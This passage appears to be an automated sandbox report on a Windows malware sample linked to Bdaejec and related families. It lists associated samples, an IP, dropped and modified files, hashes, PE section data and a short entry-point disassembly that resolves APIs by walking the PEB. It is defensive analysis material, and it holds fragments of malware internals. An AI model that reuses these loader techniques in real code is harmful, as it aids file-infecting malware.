	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	96ee8edc[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exe	Get hash	malicious	Bdaejec, Oski Stealer, Vidar	Browse	44.221.84.105
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	9608e7d593a0671671e3b7e23d1b1fcfe49a5f84da9d2e0c5560d63b091acd83.exe	Get hash	malicious	Bdaejec, GCleaner, Nymaim	Browse	44.221.84.105
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	94846EDFED07F0DFFAB570F7C0E746E0077012FA5854B6B610552A8CA5A48F74.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	96ee8edc[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exe	Get hash	malicious	Bdaejec, Oski Stealer, Vidar	Browse	44.221.84.105
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	Transaction record 5445-97660.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	3.227.160.36
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	94846EDFED07F0DFFAB570F7C0E746E0077012FA5854B6B610552A8CA5A48F74.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\TJytnf.exe	#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe	Get hash	malicious	Bdaejec, Sality	Browse
	a4#Uff09.exe	Get hash	malicious	Bdaejec, Sality	Browse
	1.0.0.2.exe	Get hash	malicious	Bdaejec, Sality	Browse
	log1.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	log2.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	2.exe	Get hash	malicious	Bdaejec	Browse
	gracNYJFpD.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol, Young Lotus	Browse
	xpKZwKFN9W.exe	Get hash	malicious	Bdaejec	Browse
	LVF7FM9Z4I.exe	Get hash	malicious	Bdaejec	Browse
	hJSrJRHret.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590817003365994
Encrypted:	false
SSDEEP:	384:1F7SJXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:uHQGPL4vzZq2o9W7GsxBbPr
MD5:	04FB7D6753629A411CC2A2E1ECB89FE3
SHA1:	AB8A44A8C160FC6332E2892ACC69E74AA5F7B2D3
SHA-256:	3BA20C131FD09D7BC928EDF02BBE0C6EDCE60EF40C91F45B83BDBFA0CA30B153
SHA-512:	ADBD9188B36590FD9566D4B6EDA1EDC1C2040C27110B38A0FE82A17028D3A3F4B70AEA56E48223C50E5BA6698AABCFA36B8683C004BC16755A4605FAB083E258
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731347675473881
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	403B5F575F5C3808C09487855ABA6CA4
SHA1:	A2D2C1B5050C78575336D584F525AD18BDAA4D05
SHA-256:	AB07285A9E2C26B2C32A55C22997FEA287248FC089D5AF36CB8BE9577ACDCAAB
SHA-512:	485423AA4FF73682DC5463F83401D2C0701565AF744CD6EF4DF4CCA641AF230AA35B96DFBF208466139DF4E95ECF987F4BAB14385C6F8C2AF0C3830A33D16638
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366523037669518
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdfRQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdfWGCq2iW7z
MD5:	BFA62DE85D5E1B317284A73C9241D3AF
SHA1:	277043F150EB2408AE00028FE84D045C71AB3252
SHA-256:	57EA921BD33B9EF82D67D675C07FDC646BF56563FCDF6FB06C3158F29DD21734
SHA-512:	556BD8F3CF6F36F6717743658A89BCC24657447CB7C2B0F3C6DD1076C39C1C2AE958D3B133750500018EF336FC29116A9193FEBC571E3C6104E94F285F0A8F65
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TJytnf.exe_bf4cc6b994b3c313b3d8ecc28fe7af8bd1d8_fcda0e7d_141c3cad-1e96-4194-9768-bece39737fcb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9734450409891874
Encrypted:	false
SSDEEP:	96:qOgFqKmwsmhnc7afzQXIDcQwc6XcEdcw34+HbHg/5ksS/Yy+U6QHAmR/xSaOygH2:LgKwi0OT3VjU/JXzuiFCZ24IO89
MD5:	0A849BFEDE2B317ABC0F923C69794225
SHA1:	9302A921158DB68CE312078267E80AD13AB2ACA5
SHA-256:	E0612B482DE8CB5D260974543E0BD8D42AE71FFC18A41BC6EB2146125EF3A660
SHA-512:	0F911971865356A0A9DBC736E3A741F5D35E22D322437C77E1C83F27DD0F74730FF990CA243311F800593DAF38D1FB072F6F82F0F6A1AB0A3A9ED0FC34EE36CD
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.6.1.5.9.6.1.9.8.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.6.1.6.0.6.5.1.0.9.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.1.c.3.c.a.d.-.1.e.9.6.-.4.1.9.4.-.9.7.6.8.-.b.e.c.e.3.9.7.3.7.f.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.9.7.6.4.c.5.-.1.8.7.4.-.4.3.a.0.-.9.4.7.d.-.7.f.5.3.5.7.3.0.e.9.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.J.y.t.n.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.c.-.0.0.0.1.-.0.0.1.4.-.3.a.c.e.-.3.5.3.7.0.7.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.0.d.5.c.4.5.b.d.c.5.1.c.b.0.5.a.f.e.e.1.8.2.0.9.f.4.8.8.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.T.J.y.t.n.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44CF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 20:22:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	158444
Entropy (8bit):	1.824947946222564
Encrypted:	false
SSDEEP:	384:2L0cBAbsJ995WUqGyTrHDJVQL9RDyB9agibAB9MHi:iBBxJ99P5yTrHDJQ9wratas
MD5:	8C7208A7B0F4859DB9BE581EE48A66A7
SHA1:	172B16D9D4185DC63AAE7BE0CE580246EE11E8CC
SHA-256:	2BEBAB3550708D5C429D6EC11417EEFDACDA3D2B7CD703F3B1775F36CE94C9AA
SHA-512:	929BEDC364ABC7F90A5DF12B87BA8E5680C7FC6FDA531F8F17C4DB8372049CA3ED7469516B472B81A2F67B268D2D89F1B703E7AC2F42F0312A07E98252563166
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........b.f............D...............X.......<...$ ......$....M..........`.......8...........T............=..$-..........` ..........L"..............................................................................eJ......."......GenuineIntel............T............b.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER46F3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.699597134214299
Encrypted:	false
SSDEEP:	192:R6l7wVeJ196O6Y+yl06ygmfmgpDM89bpKsfNjm:R6lXJP6O6Yi6ygmfmUppfU
MD5:	F106CF4DC5AE2A039897B3F1C9C5D4D6
SHA1:	CB4A8C059A50916903EF2D1CBA4231E7D19B68F3
SHA-256:	11D2E23705FADC350F637F24F192359DB4284F9864175654F5FA467C85BEBA94
SHA-512:	9DBE0A98138D7B202C9581B7C28ACD4939EE4C5E1FA41A37D0C7E8DCD14266A4CCAFF694D49933723CB3C02A40EE03E6D15E653B72C0BED053A8C64435BCA0F7
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4742.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.442991333738184
Encrypted:	false
SSDEEP:	48:cvIwWl8zsqJg77aI9wLWpW8VYzYm8M4JYgFMM+q8qVbPM2gDsRd:uIjf4I7u67VLJUM9bxgYRd
MD5:	C7CBFE72E8A3F065C7777E67013B2582
SHA1:	81B82CDD5CA02F1832B9ED9F98AEB04D215C7F8E
SHA-256:	64355F784DC0E195F4819532152484604A73B1C8E91B40084DDB924EF4313769
SHA-512:	F038166C13AF062D2C5F1978444EDCF970DF0B681EB0C84AF8E0739751DC9A945CC7E9E26376D907A461D0C4E6B932E2A6CE13B1F6B8125DDF0E28FD0012F23D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425485" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Temp\32406A5A.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Temp\TJytnf.exe

Download File

Process:	C:\Users\user\Desktop\biKy3nZEyJ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse Filename: a4#Uff09.exe, Detection: malicious, Browse Filename: 1.0.0.2.exe, Detection: malicious, Browse Filename: log1.exe, Detection: malicious, Browse Filename: log2.exe, Detection: malicious, Browse Filename: 2.exe, Detection: malicious, Browse Filename: gracNYJFpD.exe, Detection: malicious, Browse Filename: xpKZwKFN9W.exe, Detection: malicious, Browse Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse Filename: hJSrJRHret.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465999342206427
Encrypted:	false
SSDEEP:	6144:CIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNVdwBCswSbn:nXD94+WlLZMM6YFHf+n
MD5:	EBA342DCC676383AACC181B2B12EDC19
SHA1:	44B00D6226F46E5BAF415D9BE2C06781D3C5C346
SHA-256:	7E0505ED3A2C7BFA5334426B3F0FF7F49AEC2B7E48CA55C2BE017FE9A733D004
SHA-512:	FA1ABF1CF21F83DD9F4995CB1B00C1D049D334BB754C470405644E7086DE187F68CC5A77D243000FA63812871E3D2D00805DDABF05F0D1C786729324ADF59D0E
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.f.7...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.46807306180755
TrID:	Win32 Executable (generic) a (10002005/4) 98.81% Windows ActiveX control (116523/4) 1.15% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	biKy3nZEyJ.exe
File size:	3'101'704 bytes
MD5:	6963bb0311ded02ba57657ba4a61d427
SHA1:	777ed3376f2b380fef0658e6b1ab4a90e4dca901
SHA256:	98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
SHA512:	62f7cea98e3d9855333934fad2b5d3d2681109d3e095022b444e6eba284e33dba1502f050cc95adbcbe475bff8fccf2e64b59110504c4f8b23441079bfd90e06
SSDEEP:	49152:WbJ8ShfSifOsD+Q/Hg1Pi+zrEREFo8IEoypFfbVquZLlrlB6ezwA1UCKG+mipmAQ:0haIO2+Q/A1lzrqYo8I2TVquZLF8Cimr
TLSH:	60E590237AF1847AC6630332897D7779A1EDEA701936E283679C1F2D1D701D35A386A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......4...p...p...p....e0.q...}...$...}. ._...}.......6...1...p...i....e1.}....e/.r....e4.S...p...{...s...u...}.$.q...p.h.q...s.!.q..

File Icon


Icon Hash:	03d4c69ec892d0cc

Static PE Info

General

Entrypoint:	0x740000
Entrypoint Section:	A#uq
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x547CD530 [Mon Dec 1 20:53:04 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	fc8b72cd3830d0f6a9c801b4385e1454

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 74794A54h
mov dword ptr [ebp-44h], 652E666Eh
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F21252B2AF5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFEC74CCh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F21252B2C3Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F21252B2B44h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F21252B2B3Bh

Rich Headers

Programming Language:

[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 UPD3 build 30723
[RES] VS2013 build 21005
[LNK] VS2013 UPD3 build 30723

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d58a4	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33b000	0x4810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25cf70	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2a4f60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25c000	0xc70	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25941a	0x259600	6d614c1b6c91e57cc6f893e8d5353b4b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
CONST	0x25b000	0x50	0x200	9d2c259028ec9a2bead2fdb719de93b6	False	0.171875	data	1.4183627461897457	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x25c000	0x7dad2	0x7dc00	d165cf31a244df646478cfc7b91b27cf	False	0.3152025347912525	data	5.278930315697064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2da000	0x60c90	0x15000	306075b28383012b063734f6e211a392	False	0.23208472842261904	data	3.7836579408963225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33b000	0x4810	0x4a00	cab02b81ece1759cd51a94aca6929323	False	0.27322635135135137	data	4.038463935393645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
A#uq	0x340000	0x5000	0x4200	e0c06908751f6768e214a43c990d414c	False	0.7772845643939394	data	6.934503720718857	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x33baa8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4805194805194805
RT_CURSOR	0x33bbdc	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	English	United States	0.7
RT_CURSOR	0x33bc90	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.36363636363636365
RT_CURSOR	0x33bdc4	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.35714285714285715
RT_CURSOR	0x33bef8	0x134	data	English	United States	0.37337662337662336
RT_CURSOR	0x33c02c	0x134	data	English	United States	0.37662337662337664
RT_CURSOR	0x33c160	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	English	United States	0.36688311688311687
RT_CURSOR	0x33c294	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	English	United States	0.37662337662337664
